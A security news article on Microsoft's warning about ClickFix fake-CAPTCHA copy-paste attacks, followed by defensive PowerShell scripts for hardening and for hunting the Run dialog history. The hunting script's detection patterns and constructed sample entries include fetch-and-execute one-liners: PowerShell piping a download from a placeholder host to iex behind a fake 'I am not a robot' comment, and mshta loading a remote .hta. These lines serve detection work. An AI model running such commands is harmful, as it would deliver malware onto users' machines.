Microsoft Warns of ClickFix Attacks: Beware Copy-Paste Commands

Microsoft is warning about ClickFix social engineering attacks, which trick users into running a malicious command themselves, typically via a fake CAPTCHA verification page. Campaigns target Windows, macOS and Linux to deploy information stealers and remote access tools, and because the victim's own keystrokes launch the payload, there is no attachment or exploit for traditional controls to catch.


Microsoft Warns of Sophisticated ClickFix Social Engineering Attacks

Microsoft has warned that ClickFix social engineering attacks, which manipulate users into copying and pasting malicious commands into their own systems, are growing rapidly. Its security researchers report observing thousands of enterprise and consumer devices being compromised through this technique every day.

How ClickFix Attacks Work

ClickFix attacks begin with phishing emails, malicious advertisements or compromised websites that send victims to a deceptive landing page. The page shows a fake CAPTCHA prompt or error message that looks legitimate, often impersonating a trusted service such as Google reCAPTCHA, Cloudflare Turnstile or Discord server verification.

When the user clicks to "solve" the fake challenge, script on the page silently writes a command to the clipboard. On-screen instructions then tell the user to press Win+R to open the Run dialog (or to open Windows PowerShell), paste with Ctrl+V and press Enter. The pasted one-liner, commonly PowerShell or mshta, downloads and executes the malware in the user's own session.

Malware Payloads and Consequences

The attacks typically deliver information-stealing malware such as Lumma Stealer, Lampion or Atomic macOS Stealer (AMOS), which harvests credentials, browser cookies, cryptocurrency wallet data and other valuable information. Some campaigns instead deploy remote access tools (RATs) such as Xworm, AsyncRAT or NetSupport, giving attackers persistent remote control over the compromised system.

Microsoft's analysis notes that the technique is effective precisely because it relies on the user: there is no exploit, macro or malicious attachment, just a command the victim types into a trusted system tool, so perimeter and attachment-scanning controls see nothing to block. The commands chain living-off-the-land binaries (LOLBins) such as powershell.exe and mshta.exe and are obfuscated to evade detection, for example with Base64-encoded arguments or a trailing comment such as "I am not a robot" so that the visible portion of the Run box shows only benign-looking text.

Multi-Platform Threat

ClickFix initially targeted Windows, but the technique has spread to macOS and Linux. The macOS variant, first reported in mid-2025, uses the same fake-verification lure but instructs the victim to paste a shell one-liner into the Terminal. Because the command runs under the user's own account rather than as a downloaded application, it sidesteps the checks that would normally apply to a downloaded installer and fetches and runs AMOS directly.

Protection and Mitigation Strategies

Microsoft recommends several layers of defense. Organizations should restrict the Run dialog (and similar command entry points) where users do not need them, enforce application control policies, and train users on the copy-paste lure specifically. Technical controls include Microsoft Defender SmartScreen, Defender network protection to block the payload download, and PowerShell script block logging so that pasted commands are recorded (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) even when obfuscated.
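The registry-backed parts of that list can be audited, and optionally enforced, from PowerShell. The script below is an added example written for this article, not tooling from Microsoft. The key paths and value names are the standard Windows policy locations for removing the Run dialog (NoRun), enabling PowerShell script block logging and enabling Explorer SmartScreen; the grouping into a single audit function and the Defender network protection check are assumptions made here. Run it elevated for the HKLM values and for -Apply.

```powershell
# Added example (not Microsoft's tooling): audit, and optionally apply, the
# registry-backed controls recommended against ClickFix. Key paths are the
# standard Windows policy locations; the single-script grouping is an assumption.

$Controls = @(
    [pscustomobject]@{
        Name     = 'Run dialog removed (Win+R / Start > Run)'
        Path     = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
        Value    = 'NoRun'
        Expected = 1
    },
    [pscustomobject]@{
        Name     = 'PowerShell script block logging (Event ID 4104)'
        Path     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
        Value    = 'EnableScriptBlockLogging'
        Expected = 1
    },
    [pscustomobject]@{
        Name     = 'SmartScreen for Explorer/shell enabled'
        Path     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System'
        Value    = 'EnableSmartScreen'
        Expected = 1
    }
)

function Get-PolicyValue {
    # Returns the DWORD at Path\Name, or $null when the key or value is absent
    param([string]$Path, [string]$Name)
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-ClickFixHardening {
    # Emits one row per control; with -Apply, sets any non-compliant value
    param([switch]$Apply)

    foreach ($c in $Controls) {
        $current = Get-PolicyValue -Path $c.Path -Name $c.Value
        $ok = ($null -ne $current) -and ([int]$current -eq $c.Expected)
        if (-not $ok -and $Apply) {
            if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
            New-ItemProperty -Path $c.Path -Name $c.Value -PropertyType DWord `
                -Value $c.Expected -Force | Out-Null
            $current = $c.Expected
            $ok = $true
        }
        [pscustomobject]@{ Control = $c.Name; Current = $current; Expected = $c.Expected; Compliant = $ok }
    }

    # Defender network protection is a Defender preference, not a plain policy value:
    # 0 = disabled, 1 = enabled (block), 2 = audit only
    $np = (Get-MpPreference -ErrorAction SilentlyContinue).EnableNetworkProtection
    $npOk = ($np -eq 1)
    if (-not $npOk -and $Apply) {
        Set-MpPreference -EnableNetworkProtection Enabled
        $np = 1
        $npOk = $true
    }
    [pscustomobject]@{ Control = 'Defender network protection (block mode)'; Current = $np; Expected = 1; Compliant = $npOk }
}

# Report only
Test-ClickFixHardening | Format-Table -AutoSize

# Enforce (administrator required for the HKLM values and the Defender preference)
# Test-ClickFixHardening -Apply | Format-Table -AutoSize
```

NoRun under HKCU applies to the current user only and takes effect after Explorer restarts or the user signs in again; in a managed fleet the same value is delivered by the Group Policy setting "Remove Run menu from Start Menu" under User Configuration, Administrative Templates, Start Menu and Taskbar. Removing the Run dialog does not stop a user who opens PowerShell or a terminal directly, which is why script block logging and network protection are on the same list.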

Users should treat any "verification" step that asks them to press Win+R or paste a command as a red flag: no legitimate CAPTCHA requires running anything on the machine. Enterprise security teams should monitor the RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records commands launched through the Run dialog, for PowerShell or mshta one-liners. RunMRU captures only the Run dialog, so pair it with process creation telemetry (Windows Security Event ID 4688 or Sysmon Event ID 1) to catch commands pasted into PowerShell or a terminal.
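One way to hunt the Run dialog history, as an added example rather than code from Microsoft's advisory: the script below reads RunMRU in the order Explorer records it (MRUList, most recent first), strips the "\1" marker Explorer appends to each stored command, and flags entries that match common ClickFix traits. The key path is Explorer's standard location; the indicator list is an assumption to tune per environment, and the sample entries at the end are constructed for illustration, not real telemetry.

```powershell
# Added example (not Microsoft's code): scan the Run dialog history (RunMRU) for
# ClickFix-style one-liners. The key path is Explorer's standard MRU location;
# the indicator list and the sample entries are assumptions constructed for illustration.

$RunMruPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Traits seen in ClickFix commands. Each pattern is an assumption; extend for your environment.
$Indicators = @(
    @{ Name = 'PowerShell with hidden window';       Pattern = '(?i)powershell.*-w(indowstyle)?\s+h(idden)?' },
    @{ Name = 'Encoded PowerShell command';           Pattern = '(?i)powershell.*-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}' },
    @{ Name = 'mshta launching remote content';       Pattern = '(?i)mshta(\.exe)?\s+["'']?(https?:|\\\\)' },
    @{ Name = 'Download cradle piped to IEX';         Pattern = '(?i)(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|downloadstring).*\|\s*(iex|invoke-expression)' },
    @{ Name = 'Inline Base64 decoding';               Pattern = '(?i)frombase64string' },
    @{ Name = 'Fake verification text in a comment';  Pattern = '(?i)#.*(not a robot|verif|captcha|cloudflare)' }
)

function Get-RunMruEntries {
    # Returns the current user's Run dialog history, most recent first
    param([string]$Path = $RunMruPath)
    if (-not (Test-Path $Path)) { return @() }
    $key = Get-ItemProperty -Path $Path
    # MRUList is a string of slot letters (e.g. "cab") ordered most recent first
    $order = if ($key.MRUList) { [string]$key.MRUList } else { '' }
    foreach ($letter in $order.ToCharArray()) {
        $prop = $key.PSObject.Properties[[string]$letter]
        if ($null -eq $prop) { continue }
        # Explorer stores each command as "<command>\1"; drop the trailing marker
        $cmd = ([string]$prop.Value) -replace '\\1$', ''
        [pscustomobject]@{ Slot = [string]$letter; Command = $cmd }
    }
}

function Test-ClickFixCommand {
    # Returns the name of every indicator the command matches (nothing if clean)
    param([Parameter(Mandatory)][string]$Command)
    foreach ($ind in $Indicators) {
        if ($Command -match $ind.Pattern) { $ind.Name }
    }
}

function Find-ClickFixInRunMru {
    # Emits one row per flagged entry; defaults to the live RunMRU of the current user
    param([object[]]$Entries = (Get-RunMruEntries))
    foreach ($e in $Entries) {
        $hits = @(Test-ClickFixCommand -Command $e.Command)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Slot = $e.Slot; Indicators = ($hits -join '; '); Command = $e.Command }
        }
    }
}

# Constructed sample history (not real telemetry): slots b and c should be flagged, a and d should not
$SampleEntries = @(
    [pscustomobject]@{ Slot = 'a'; Command = 'notepad' },
    [pscustomobject]@{ Slot = 'b'; Command = 'powershell -w hidden -c "iwr http://example.invalid/v.txt | iex" # I am not a robot - reCAPTCHA Verification ID: 7811' },
    [pscustomobject]@{ Slot = 'c'; Command = 'mshta https://example.invalid/verify.hta' },
    [pscustomobject]@{ Slot = 'd'; Command = 'cmd /c echo hello' }
)
Find-ClickFixInRunMru -Entries $SampleEntries | Format-List

# Live scan of the current user's Run history. To cover every profile on a host,
# load each user's hive and point -Path at HKU:\<SID>\Software\...\Explorer\RunMRU.
Find-ClickFixInRunMru | Format-List
```

The same indicator table can be applied to the CommandLine field of process creation events, which is where commands pasted into PowerShell or a terminal show up, since those never touch RunMRU.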
